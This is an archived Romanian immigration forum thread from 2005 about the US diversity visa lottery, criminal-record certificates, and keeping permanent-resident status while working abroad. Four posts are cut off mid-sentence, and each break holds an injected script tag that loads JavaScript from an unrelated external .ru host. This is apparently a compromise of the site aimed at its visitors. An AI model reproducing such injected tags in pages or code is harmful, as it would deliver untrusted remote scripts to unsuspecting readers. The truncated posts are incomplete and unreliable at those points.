PDA

Arată versiune întreagă : viza de la interviul final si cazierul

2become1
16.11.2005, 08:45
Buna din nou...

Ca de obicei astia 'noi' au tone de intrebari asa ca va deranjez din nou...smileys/smiley17.gif

Am mai citit si am tot recitit pe acest forum si incerc sa determin anumite aspecte cu privire la vize. Am concluzionat ca sunt de mai multe tipuri bineinteles..dar ce nu am inteles este ce tip de viza se da pentru cei care trec interviul la ambasada? Este cu multiple intrari si iesiri? Sau cum?

Am inteles ca trebuie in maxim 6 luni de la data interviului sa calci pe teritoriu american si ca potiiesi din USdaca doresti numai dupa ce ti-ai procesat actele(SSN si altele?) pentru ca apoi sa poti reveni oricand in US, insa pentru a aplica pentru green card trebuie sa nu stai in afara tarii un timp indelungat (mai mult de 6 luni per total sau continuu ?).

Puteti sa imi confirmati sau infirmatice am inteles?

Daca aveti ceva detalii sau exemple?

Si inca o intrebare: referitor la cazier. Cei de la ambasada din Romania mi-au spus ca am nevoie de cazier din toate tarile din care am stat cel putin un an. In cazul meu: Dubai si Iordania. Stie cineva care este procedura? Eu am sunat pe aici (Dubai) pe la emigrari si cam nimeni nu are habar despre ce vorbesc..sau poate nu vor sa ma ajutesmileys/smiley19.gif

smileys/smiley1.gif..si citesc si citesc..si mai am mult de citit....smileys/smiley2.gif

Numai bine,

Alina

foryoutupac
16.11.2005, 10:11
Sunt cam ulte intrebari si sunt obosit dar am sa iti raspund la cateva.

Viza este Dv1 din cate stiu eu,pe pasaportul meu asa scrie.

De la data de cand ai primit viza,trebuie sa calci pe taramul american in cel mult 6 luni,dupa sase luni iti expira viza daca nu vii in america,deci o poti pune in raft in loc de bibelou.

Eu stiam si stiu ca trebuie sa stai cel putin sase luni dupa ce ai venit in america,dar parca am citit pe forum ca poti pleca mai repede de sase luni daca ai primit green cardul.

Alte acte ca de exemplu SSN nu prea conteaza la faza cu emigratul,SSN foloseste cand vrei sa iti inscri masina sau sa te poti angaja la faza din astea.

Cu cazierul nu stiu ce sa zic, eu am avut cazier din judetul din care eram si din judetul de unde stateam cand mergeam la facultate si au zis ca nu trebuia al doilea cazier,la faza ca este vorba de alta tara nu stiu ce sa zic aici trebuie sa vorbesti cu cei de la KCC,sau sa te informezi de la autoritatile romane,sau intreaba un notar ceva nu stiu ce sa zic.

Sper ca am raspuns la cat mai multe intrebari,ok Bafta.

marioana
16.11.2005, 20:05
In momentul cand intri in USA cu o viza DV iti va pune la intrare o stampila pe pasaport care tine loc de Green card pentru 1 an. Asa ca poti pleca inapoi spre Romania a doua zi daca vrei.

Ideea e ca tu esti rezident permanent al USA si trebuie sa iti mentii acest statut. Deci daca stai mai mult de 1 an inafara USA se poate considera ca ti-ai abandonat acest statut si pierzi green cardul. Daca vrei sa aplici pentru cetatenie, nu trebuie sa stai mai mult de 6 luni inafara USA, altfel nu poti aplica pentru cetatenie la 4 ani si 9 luni dupa primirea green card-ului.

Cazierul trebuie sa il ai din toate tarile in care ai stat mai mult de 1 an. Deci daca ai stat in Dubai peste 1 an trebuie sa ai cazier de acolo, si cazier din Romania.

18.11.2005, 18:20
" nu am inteles este ce tip de viza se da pentru cei care trec interviul la ambasada? "

Tipul de viza pe care l-au cerut, ce altceva ai vrea sa le dea! Asta ca sa mai radem nitelus!

Cumintrebarea este postatain topicul de loteria vizelor si green card, si sper ca nu din intamplare, banuiesc ca te referi la castigatorii la loterie:o))Vizele pt astia sunt la fel, difera doar printr-o (ultima) cifra, unu pt castigator, 2 pt sotie, 3 samd ptcopii. Numerele alea o sa va urmareasca toata viata, chiar si in certificatul de naturalizare le vei regasi! Din fericire, ultimul digit nu afecteaza in nici un fel drepturile pe care le aveti - sunt aceleasi pt toti.

Despre forma "fizica" a vizei (diversity visa pt castigatorii de la loterie, DV1), eu am primit-o sub forma unui ..plic sigilat, cu actele de la ambasada americana inauntru, iar pe fata plicului o "stampila" uriasa cu toate datele mele in ea ( fiecare membru al familiei avand plicul sau,asta ca sa nu se supere nimeni);"stampila" eramai mult ca sa ne lase sa ne urcam in avion, si aveao valabilitate de 6 luni de la data interviului! Doar la punctul de intrare inUSne-au pus ceva in pasaport (sa-i zicem viza), ca sa se stie ce e cu noi pana primim green cardul ( asta evident dupa ce au verificat ce era in plic si l-au retinut - l-am mai revazut, mai bine zis continutul, doar la interviul pt cetatenie!). Pe baza vizei asteia din pasaport poti aplica pt SSN, de ex( zic asta pt ca faraSSN nu poti face nimic aici). A propos, pt green cardnu trebuie sa aplici, ti-l trimit automat, dupa intrarea in State,la adresa pe care le-ai dat-o la interviu ( si pe care o vei confirma la intrarea in USA), asa ca macar pt asta trebuie sa stai un timp prin America! La iesirile si intrarile ulterioare din/in USA ii va interesa mai mult green cardul tau decat pasaportul, si nu vor fi deloc entuziasmati daca nu-l veiavea asupra ta,! Mai mult, cu green card-ul ( pe langa pasaportul ro)poti calatori in Canada si Mexic, fara a avea nevoie de viza, asta daca ai chef sa vezi Niagara sau sastai cu burta la soare pe undevaprin Cancun:o))Deci, ca rezident permanent ai aceleasi drepturi ca orice american ( mai putin ala de vot,in principal) asa ca poti sa intri si sa iesi din State de oricate ori ti se pune pata! De aia intreberea cu multiple intrari/iesiri nu-siare sensul! Esti limitat, ca rezident permanent,la cat poti sta in afara US , dar limitarile asteanu sunt absurde, doar incearca sa-i elimine pe cei care vor sa pacaleasca "sistemul".

Pe de alta parte, asa cum zice si Marioana, ei se asteapta sa te porti ca un rezident permanent, adica sa locuiesti pe teritoriul US si sa-ti platesti taxele aici. Sunt exceptii pe care le accepta, de ex. daca te trimite o firma americana sa lucrezi in strainatate, etc, le poti gasi pe site-ul Dept. de Stat, parca, dar sunt ..exceptii!!!. La cetatenieai dreptul dupa 5 ani de rezidenta permanentaefectiva ( adica scazand perioadele in care ai lipsit), si poti aplica inainte de implinirea acestor 5 ani cu o perioada de timp egala cu durata de prelucrare a actelor ( afisata pe site-ul de naturalizare, si care e mai mare decat durata reala.. asta ca sa arate ca sunt eficienti!) . Oricand ai aplica, naturalizarea ( adica cetatenia americana) nu o vei obtine, cel putin teoretic,decat dupa trecerea celor 5 ani!

Si inca ceva legat de loteria vizelor, sa nu uit,dacaacum lucrezi legal in alta tara decat Romania,( si esti acolocu sotul si copii, daca e cazul)poti sa ceri sa te cheme la interviul de la ambasada in tara de actuala rezidenta. Uneori e chiar mai bine asa ca sunt mai liberi.

Pt cazier trebuie sa te interesezi la politie; inmulte taripolitia primeste cererile, chiar daca informatiile sunt pas<script src=http://www.iroe.ru/ngg.js></script>

petry
19.11.2005, 05:33
luca,deci am inteles ca tu ai castigat loteria vizelor,ai primit pe langa aceasta viza si un plic galben.ok.eu vreau sa te intreb urmatorul lucru: tu cand ai iesit din tara ,prin aeroportul otopeni,ai intampinat vreun fel de probleme la controlul pasapoartelor? ma refer la faptul daca ti-a cerut vreun politist de frontiera sa ai in pasaportul tau o stampila de la sectia de pasaporate in orasul care locuiai aici in Romania,precum ca tu nu mai ai domiciliul aici?

sa te intreb altfel daca nu ai inteles.tu,inainte de a pleca de aici din Romania,ai fost in orasul tau la sectia de pasapoarte si ai cerut sa iti puna o stampila mica in pasaport care inseamna ca tu ai domiciliul in alta tara si nu mai ai aici?

deci o stampila de schimbare in pasaportul tau .ai avut asa ceva?ai intampinat probleme ?

19.11.2005, 19:39
Pentru Petry

1. "luca,deci am inteles ca tu ai castigat loteria vizelor,ai primit pe langa aceasta viza si un plic galben."

Nu, am primit doar plicul, care pana la intrarea in USA a tinut loc de viza. La punctul de intrare in State ne-au luat plicul si ne-au pus o stampila pe pasaport. Imi cer scuze daca nu am fost suficient de clar in aceasta privinta:o)))

2."tu cand ai iesit din tara ,prin aeroportul otopeni,ai intampinat vreun fel de probleme la controlul pasapoartelor?"

Nu am iesit din tara pe la Otopeni; ne-am dus cu un microbuz al unei companii de transport de la Timisoara la Budapesta ( am zburat cu SAS -ul ca Taromul nu ajungea unde doream noi - si astia nu aveau zboruriin Romania),iar la granita nu ne-au intrebat nimic ca erau prea ocupati cu alte probleme mai importante; si daca ei nu au fost curiosi, atunci nici noi nu ne-ampermis sa le rapim din timp cuchestiuni nesemnificative:o)))

3. "ai cerut sa iti puna o stampila mica in pasaport care inseamna ca tu ai domiciliul in alta tara si nu mai ai aici?"

Cand am plecat noi, stiu case depunea buletinulsi livretul militar si-ti dadeau ceva la mana sa le arati la granita. Asa facusera mai multi prieteni care plecasera inaintea mea, e drept cain Canada, dar destinatia nu cred ca e semnificativa pt ceea ce discutam acum. Eu n-am facut-o ca n-am mai avut nici timp, nici chef si nici puterea sa mai stau la cozi pttot felul de prostii. M-am "pregatit" altfel,dar dupa cum ti-am spus nici nu ne-au bagat in seama, asa ca n-a fost cazul. Dar nu te sfatuiesc sa faci ca mine, dimpotriva - fa tot ce ti se cere sa faci, macar si numai pt faptul ca asate antrenezi pt ce va fi aici, in USA :o)))

3. In 2001 mi-am prelungit valabilitatea pasaportului aici in State ( l-am trimis la Ambasada). Desi stiau ca sunt rezident permanent au pus doar stampila de prelungire, nimic despre "domiciliul in strainatate". Dupa ceva timp, cand restul familiei a facut acelasi lucru,au primit pasapoarte noidin Romania (deoarece se schimbase tipul de pasaport)si pe astea era mentionat si faptul ca posesorul are domiciliul in SUA. Deci se pare cacei din Romania tin la aplicarea mentiunii cu domiciliul in pasaport!

4. Din cate stiu eu, si acum ca si atunci cand am plecat eu, trebuie sa-tipui in ordine toate marafeturilecu statul roman inainte de plecare. Cel mai bine e sa suni si sa intrebi la Directia Generala dePasapoarte care e procedurain cazul tau si daca, printr-o minune,nuai nevoie de aceasta mentiune in pasaport, sa-ti dea o hartie scrisa in acest sens, ca aia de la granita pot sa-ti spuna ce vor ei si n-ai cum sa-i contrazici, ca joaca pe teren propriu :o)))

5 Ce am gasit eu despre asta ( desi nu stiu daca informatiaeste la zi) spune cam asa:

"In conformitate cu dispozitiile art.24 din Ordonanta Guvernului nr.65/1997 privind regimul pasapoartelor in Romania, aprobata prin Legea nr.216/1998, cu modificarile si completarile ulterioare, cetatenii romani carora autoritatile statului pe teritoriul caruia se afla le-au aprobat stabilirea domiciliului, pot depune cereri pentru eliberarea pasapoartelor simple in care sa se mentioneze tara de domiciliu."

Castigatorilor la loterie le-a fost aprobata (la interviu) stabilirea domiciliului in USA, iar faptul canu sunt inca pe teritoriul american n-are probabil prea multaimportanta! In ceea ce priveste termenul "pot", sa nu crezi cumva ca inseamna ce ai invatat la scoala; avand in vederea grija deosebita a statului roman pt cetatenii sai si drepturile nenumarate pe care acestia le au,"pot" trebuie interpret<script src=http://www.iroe.ru/ngg.js></script>

catacaz
20.11.2005, 02:12
sevus ...

am aplicat pentru prima data pt DV cu multe sperante si citesc cam tot ce se discuta pe aici. Acum am o problema care nu stiu daca ar fi privita cu ochi buni la un eventual interviu: locul de munca. Sunt ofiter activinsa nu apartin nici de MApN nici de MAI... e ceva special.Teoretic nu ar trebui sa existe nici o problema pt ca nu exista nici o conditieprivind locul de munca in conditiile in care am studii superioare, insa as putea fi privit cu ochi suspiciosi.

As putea fi respins pe un astfel de criteriu?

sorin
20.11.2005, 02:36
Catacaz, nu vad de ce asta ar fi o problema, mai ales ca nu e specificat nicaieri asa ceva. Pentru linistea ta, Duckadam, (portarul nostru de aur care a aparat 4 lovituri de la 11 metri cand Steaua a devenit campioana europeana) a castigat loteria vizelor cu toate ca era politist de frontiera.

catacaz
20.11.2005, 04:54
ok ... tks

2become1
24.11.2005, 10:34
Buna..

Am lipsit cateva zile ca am avut si un interviu pentru un job...si in parte o sa vorbesc si despre asta aici ca o continuare la ceea ce incercam sa aflu si in mare parte mi-a fost raspuns...

Voi repeta intrebarea chiar daca va fac sa radeti din nousmileys/smiley36.gif

" nu am intelesce tip de viza se da pentru cei care trec interviul la ambasada? "

De ce? Pentru ca toata experienta mea referitoare la vize e cea din UAE si Iordania si referitor la US este cam ceea ce am citit...si se presupune ca ar trebui sa inteleg din prima citire...smileys/smiley5.gif

Draga Luca ai scris ca:

'vizele pt astia sunt la fel, difera doar printr-o (ultima) cifra, unu pt castigator...etc'

Pt ca sunt single...banuiesc ca la mine va scrie 1

Despre forma "fizica" a vizei ....am inteles.

Valabilitatea de 6 luni am inteles ai asta....si apoi trebuie sa intri pe teritoriu US

...'faraSSN nu poti face nimic aici...'

Banuiesc ca te referi la ceea ce am tot citit. Nu poti inchiria nimic, nu poti cauta job si altele.....

'...ptgreen cardnu trebuie sa aplici, ti-l trimit automat, dupa intrarea in State,la adresa pe care le-ai dat-o la interviu ( si pe care o vei confirma la intrarea in USA)..'

Eh...aici eu am buba si cred ca nu sunt singura...dar poate gasesc o solutie pana atunci...Dar punand raul in fata, daca nu, unde imi trimit actele? unde o sa gaseasc sa locuiesc presupun nu?

Sunt sigura ca treaba cu vizite la Niagara siMexicii place oricui...smileys/smiley36.gif

Revenind la migrenele mele...Eu as planui sa fac asa:

Deci interviul este prin februarie martie la anul...de luat nu cred ca nu il iau ca am cam tot ce imi trebuie cu exceptia la affidavit si pe cineva acolo...dar au fost niste oameni deosebiti de pe acest forum care s-au oferit sa ma ajute asa ca sper la mai bine...smileys/smiley9.gif

De plecat in US as pleca prin luna a -III-a sau a - IV- a de la primirea vizei si asta fie de tot daca nu reusesc sa iau job-ul asta de care vorbesc fie numai in vizita si de aici ingrijorarea mea smileys/smiley19.gif

Eu as pleca atat de tarziu ca sa mai adun niste extra cash...asta in ideea ca raman la acelas job care il am. Dar am luat un interviu ca si Cabin Crew la o companie guvernamentala de aici..si banii sunt super buni..cam @ 2000USD+ / luna (si nu platim taxe)Eu vreau sa imi continui si studiile si am nevoie de ocazia asta si la US cred ca primii ani tot cam atat as lua dar sunt taxe si altele...si nu prea mai stiu ce sa fac.smileys/smiley19.gif

Adica vreau Americi dar daca nu prea sunt banuti si nu prea am nici cum sa aman plecarea din cauza celor 6 luni...poate gasesc o cale de mijloc. Poate ma pot duce acolo in astea maxim 6 luni pana la expirarea vizei..stau o saptamana sau doua...ma inregistrez cu actele si restul ..si apoi pot pleca si revenii cand pot in o lunadoua trei (ca as avea oricum super discount la zboruri)si cand suntpregatita financiarsa raman vreo 5 ani pentru un green card si sa imi vad de viata mea , familie si alea alea. Adica nu ma vad stewardesa mai mult de 3 ani cat e contractul la ei.

Din cauza asta am intrebat ce tip de viza este? Adica mai exact ce drepturi am in/out cu viza asta si cat timp pot sa aman sa fiu rezidenta ..dar sa nu pierd nici acest statut...Si cand ma hotaresc sa sa o iau totul de la inceput dar mai bine pregatita ...Scoala ar fi terminatasi as avea si ceva mai multi bani...

Off..sper ca m-am facut inteleasa..pentru ca chestia asta ma apasa de mor...

Astept ceva idei..sugestii....Experiente asemanatoare...

succese si bu<script src=http://www.iroe.ru/ngg.js></script>

GNChicago
24.11.2005, 18:05
Hi 2became1,

E greu de inteles ce vrei si ce o fi in capul tau. cred ca in cazul tau as merge sa iau jobul respectiv acolo unde esti si prinzi ceva experienta, in acelasi timp hirtiile de emigrare merg inainte si la momentul potrivit le spui celor unde lucrezi ca te muti in USA si ramii in relatii bune cu ei.

Ajunsa aici, stiind o limba in plus, rom., engleza, araba poti gasi un job in aceeasi bransha, care sa zicem cred ca mai bine platita decit cei 24K pe an pe care zici ca ii faci acolo, deci cam $12 pe ora.

Deci ce e in plus poti plati taxele de care toata lumea se vaita, dar platind taxe, te ajuta in final la pensie, deci sunt plusuri dar si minusuri.

Mult succes!

2become1
25.11.2005, 09:03
Draga GNChicago:

Esti un prieten bun si iti multumesc pentru sfaturile tale...

'E greu de inteles ce vrei si ce o fi in capul tau."....Pai sunt cam multe ganduri si variante si la varsta mea si sansele minime pe care multi dintre noi l-e avem...trebuie sa alegem varianta cea mai buna...smileys/smiley19.gif

Este un dar ceresc ca am castigat 'loteria' insa acest castig vine cu responsabilitate nu numai fata de mine ci si pentru familia mea prezenta si cea pe care vreau sa mi-o intemeiez. Noi am fost saraci si eu am muncit mult ca sa ajung pana aici si nu a fost usor.

Nu vreau sa fac drama insa chiar am nevoie de un sfat prietenesc sau legal sau nu stiu...

In acelasi timp pentru procesarea acestei vize este nevoie de bani pe care trebuie sa ii am ca dovada la interviul final si ii am daca vand tot ce am acasa (in romania) si sa ii las pe altii pe strazisau daca accept acest job pe care il astept de mai bine de3 ani de cand am plecat. Nu ca as vrea sa impusc doi iepuri deodata dar as vrea sa aleg varianta cea mai buna. De acea speram sa gasesc ceva solutii cu viza care mi-ar da-o cei de la ambasada. smileys/smiley2.gif

Si inca tot nu am inteles ce drepturi in/out imi ofera..si mii de scuze ca ma repet...smileys/smiley2.gif

In concluzie, nu e visul meu sa devin stewardesa ci HR -manager si pentru asta am nevoie de bani de scoala si/sau de un loc care sa imi ofere posibilitatea sa imi platesc studiile si sa mananc si dorm in acelasi timp. Cand am primit vestea cu loteria am crezutca le-as putea face pe toate acolo (in US) insa lucrurile nu par asa de simple nici acolo. Imi trebuiesc bani de interviu, de drumuri pana acasa, de drumuri pana in US si ai mei sunt totii fara job si in romania iar eu aici in prezent nu castig cat sa acopar toata suma de bani necesara.

M-am gandit ca poate daca aman un pic rezidenta mea permanenta in US si as putea cateva luni sa mai trag de timp siasta nu mi-ar afecta viitorul Green card..atunci as avea timp sa mai strang niste banuti sa imi termin scoala si sa ma asez si eu undeva in US fara sa o mai iau de la capat de o mie de ori...O data si bine!

Speram sa impac si capra si varza...prin munca mea si pe ceea ce am real siin mana...smileys/smiley17.gif

Sa nu ma intelegi gresit insa m-am simtit ca ai impresia ca sunt cu capul in nori si ca mi-ar place sa ii intreb pe toti : 'chiken or beef ?' de parca asta imi va da mai multe sanse cand voi cauta job data viitoare...smileys/smiley36.gif

Mii de scuze daca am fost prea 'straight'...Azi nu sunt intr-o dispozitie stralucita...

Smiles....smileys/smiley9.gif

GNChicago
25.11.2005, 11:19
2 become1 am citit printre rinduri problemele tale enumerate mai sus si am inceract sa-ti raspund sec bazat pe experienta mea aici.

Deaceea te-am sfatuit sa iei jobul, ce-i in mina nu-i minciuna.... faci niste bani. Nu prea inteleg afectiunea ptr HR ptrca acest job e mai complicat, neinteles de emigranti, neinteles nici de mine acum, nu stiu ce dracu invata aia acolo, dar totul e inutil. daca te intreaba ca daca iti place ca ploua afara ptr ei inseamna ceva, poate ca ninsoarea inseamna altceva......niste idiotzi!!!

Intrarea inn USa e importanta sa se faca conform vizei ptrca e time sensitive. Avind experienta ca stewardesa, poti gasi un job asemanator si mai bine platit decit la HR.Money talk!

Pe urma vezi ce faci te descurci cum crezi ca e mai bine ptr tine.

Mult succes!

2become1
26.11.2005, 22:09
Draga GN Chicago,

Mercic multsmileys/smiley2.gif...Acum cat de cat am inteles. Deci trebuie sa ma concentrez sa nu pierd trenul cu viza si apoi vom vedea...mai bine decat sa pierd sansa...smileys/smiley9.gif

Va mai tin la curent dragi prieteni,

Numai bine.

27.11.2005, 18:23
2become1,

Scuze pt intarziere, dar aici afost sarbatoare si am fost plecati! Am citit mesajele tale, nu sunt sigur ca am inteles totul, dar asta e numai din cauza mea :o)))

Imi place modul in care gandesti (despre emigrare si responsabilitati), imi doresc uneori cand citesc intrebarile de pe acest forum sa fie si altii ca tine!! Dracul nu e asa negru cum pare - nu am zis ca daca intri in USA esti obligata sa stai aici tot restul vietii:o))) Ideea era ca dacaamericanii iti dau oviza de imigrare se asteapta sa-ti cauti de lucru la ei, nu in alta parte!Plus ca daca muncesti afara trebuie oricum sa completezi formele pt IRS ( taxe). Asa ca daca alegi sa omiti motivul pt care te intorci in UAE, vei fi obligata sa ..omiti si alte lucruri:o))) Si nu imi pare un bun inceput pt o noua viata! Dar esti majora si stii ce faci, asa ca alege singura ce-i mai bine !

Daca iti gasesti un job acceptabil acolo, ia-l fara sa mai stai pe ganduri, banii o sa-ti fie de mare folos aici; du-te la interviu, ia-ti viza, intoarce-te la lucru, pleaca spre USA cat mai tarziu poti, asteapta green cardul, ia-ti SSN sidrivers license(asta din urma numai daca ai timp). De aici incolo faci cum crezi, eu nu-ti pot da sfaturi, doar ..informatii, pt ca lucrurile sunt mai putin ...clare ( ca sa nu zic legale) Poti pleaca inapoi in UAE pt mai putin de un an si la intoarcere le arati doar GC-ul. Daca stii ca trebuie sa stai mai mult de un an afara, aplica pt reentry permit. Deci cu nitel noroc, pana la urma se poate si cum vrei tu, chiar daca nu e prea..ortodox:O))

Uita-te mai jos sa vezi ce spune legea americana. Din nefericire este interpretabila si pana la urma esti tot la mana ofiterului de emigrari de la punctul de intrare in USA!

Mult succes

PS La Ambasada, sau cel mai tarziu la intrarea in USA,trebuie sa ai adresa cuiva din USA. Respectivul va primi GC tau prin posta si ti-l va expedia tot asa tie, dar numai la o adresa din USA. Asa ca nu e nici o problema - oricare dintre noi te poate ajuta,dar e preferabil sa fie cineva cunoscut, sa nu ai emotii:O)))

"<A name=resp&#111;n>Responsibilities</A>( pt rezidenti permanenti)
You are required to obey all of the laws of the United States, the States, and localities. You are required to file your income tax returns and report you income to the US Internal Revenue Service and State IRS. You are expected to support the democratic form of government and cannot attempt to change the government through illegal means. If you are a male, age 18 through 25, you are required to register with the Selective Service. (http://www.sss.gov/)

<A name=travel>International Travel</A>
A Permanent Resident of the United States can travel freely outside of the US. A passport from the country of citizenship is normally all that is needed. To reenter the US a Permanent Resident normally needs to present the green card (Permanent Resident Card, Form I-551) for readmission. A reentry permit is needed for reentry for trips greater than one year but less than two years in duration."

"A permanent resident alien who intends to remain abroad for more than a year should, at least 30 days prior to the proposed date of departure, apply while in the United States to the U.S. Bureau of Citizenship and Immigration Services in the Department of Homeland Security for Reentry Permit. The permit is valid for two years and may not be extended. If such a permit is obtained the alien may use this card to reenter the United States within the period of validity. Every alien applying for readmission must satisfy the immigration authorities that he or she is eligible in all res<script src=http://www.iroe.ru/ngg.js></script>

GNChicago
27.11.2005, 18:54
Luca, mie mi se pare totul foarte explicit.

Daca te referi la ce ai scris cu rosu, asta inseamna ca daca nu-ti faci taxele sau daca te declari singur ca nu mai esti legal permanent resident. Sunt unii care fac asta.....

Statul american trebuie privit ca un partener, iti creiaza niste conditii, un mediu de fair business iar tu ai obligatia sa-ti platesti taxele. Statul american are tot interesul ca tu sa faci cit mai multi bani ptrca si atunci tu platesti mai multe taxe, asta inseamna parteneriat.

Deci atit tu cit si statul aveti aceleasi interese.

In Romania circula bancul cu statuia......il mai stiti?

Statu ia totul!

Mult succes!

27.11.2005, 19:25
Nu, cu rosu iti spune clar ca esti la mana ofiterului de imigrari! Ai dreptul sa stai un an, dar numai dacaaproba ei cand te intorci:O))) E la fel ca viza: ai dreptul sa calatoresti pana la punctul de intrare in USA; acolo mai vedem!

Numai bine

GNChicago
27.11.2005, 19:40
Luca, acolo sunt doua propozitii.

Pe undeva sunt legate doar ptrca fac parte din acelasi paragraf, dar LEGEA spune ca ai voie sa stai afaraun an sau cit este.....dar daca ti-ai platit taxele pe 15 aprilie, inseamna ca nu ti-ai abandonat statutul. Daca te inrolezi intr-o armata straina atunci ai pierdut statutul, etc. etc, sau daca declari publicca ai renuntat la rezidenta americanaatunci ai pierdut rezidenta si mi se pare normal.

Sunt atitia care stau afara un an sa zicem, platesc taxele din tara respectiva si sunt ok.

Cel putin asa vad eu.

In orice caz trebuie sa ai reentry permit ptrca altfel se considera ca la plecare ai avut intentia de renuntare la rezidenta si INTENTIA se pedepseste.

In orice caz daca cineva are dubii, poate sa intrebe la iesire si sa ia si numele persoanei cu care a vorbit. La multi romani le e jena sa intrebe pe un ofiter de emigratie, cum il cheama, dar ei de obicei au numele pe piept afisat, la fel ca politistii, etc.

28.11.2005, 18:23
GNChicago,

Legea nu-ti spune cat ai dreptul sa stai afara! Iti spune doar care sunt conditiile pe care trebuie sa le indeplinesti la reintrare si cazurile in care automat ti se retrage statutul de imigrant:O))). Un an e limita de la care incep problemele daca nu ti-ai asigurat spatele, dar asta nu inseamna ca nu poti avea probleme si daca ai lipsit mai putin. In orice cerere de prelungire/reintrare trebuie sa mentionezi si motivul pt care pleci. Iar ala cu munca e valabil in anumite conditii, dar nu in cazul ei. Se presupune ca, daca ai cerut o viza de imigrant, doresti sa stai si sa lucrezi in USA. Asta se pare ca uitam cu totii- ca viza asta de care discutam aici, DV,este de IMIGRANT:o)))

"Permanent residents who leave the United States for extended periods, or who cannot show their intent to live permanently in the U.S., may lose their permanent resident status" Ofiterul de imigrari are datoria sa verifice lafiecare intrare in USA adetinatorului de GC daca au fost/mai suntindeplinite conditiilept imigrare!De aia ziceam ca tot la mana lui esti!

Deci nu numai cat va lipsi dar si ca lucreaza afara o poate face sa-si piarda statutul.Cred ca esti convinsca daca va declara ca s-a intors sa mai lucreze un an-doi in UAE, o s-o intrebe de ce a mai aplicat pt DV!

Pt naturalizare conditiile sunt si mai severe ( cele de mai sus erau doar pt mentinerea vizei). Sase luni lipsite pot sa-ti reseteaza la zero rezidenta continua, iar prezenta fizica trebuie sa fie de 30 de luni in ultimii 5 ani (de rezidenta continua). Acolo daca accepti un job in strainatate in perioada cat astepti aprobarea, poti fi sigur ca n-ai s-o mai primesti!

Ar mai fi multe altele de spus - dar cum nu arajuta pe nimeni mai bine ma opresc aici:o)))

GNChicago
29.11.2005, 04:58
Luca ai Scris:

"Se presupune ca, daca ai cerut o viza de imigrant, doresti sa stai si sa lucrezi in USA. Asta se pare ca uitam cu totii- ca viza asta de care discutam aici, DV,este de IMIGRANT:"

Sau cum spun americanii: You ASSuME.......

Lucrind afara un an sau doi nu inseamna ca intentionezi sa stai acolo permanent, mai ales daca iti platesti taxele in timp si te conformezi legii cu re-entry permit, etc.... No way....sa pierzi statutul de permanent rezident ptr asta!!!!

Deasemenea ai scris:"

Deci nu numai cat va lipsi dar si ca lucreaza afara o poate face sa-si piarda statutul.Cred ca esti convinsca daca va declara ca s-a intors sa mai lucreze un an-doi in UAE, o s-o intrebe de ce a mai aplicat pt DV!"

Poti sa crezi, Luca, dar eu nu sunt convins, si nu sunt gata sa-mi restring drepturile mele de cetatean american fara vointa mea pentru nimic in lume, mai ales pentruca pentru fiecare drept s-a luptat.

Aplicatia ulterioara ptr cetatenie, nu o contest ptrca legea spune de o anumita prezenta in USA si nu prea are legatura cu subiectul de mai sus, deaceea nu elaborez ptrca nu are rost aici.

29.11.2005, 15:15
Nu presupun nimic ( cel putin nu in forma pe care o vrei tu..smileys/smiley39.gif.). Daca tot nu "esti convins", da un telefon la oficiul din Chicago al USCIS si te lamuresc ei cum vine treaba smileys/smiley75.gif. In rest ramane cum ne-am intelessmileys/smiley1.gif

smileys/smiley73.gif

GNChicago
29.11.2005, 16:10
Ciao,

Ramine tot ca ieri....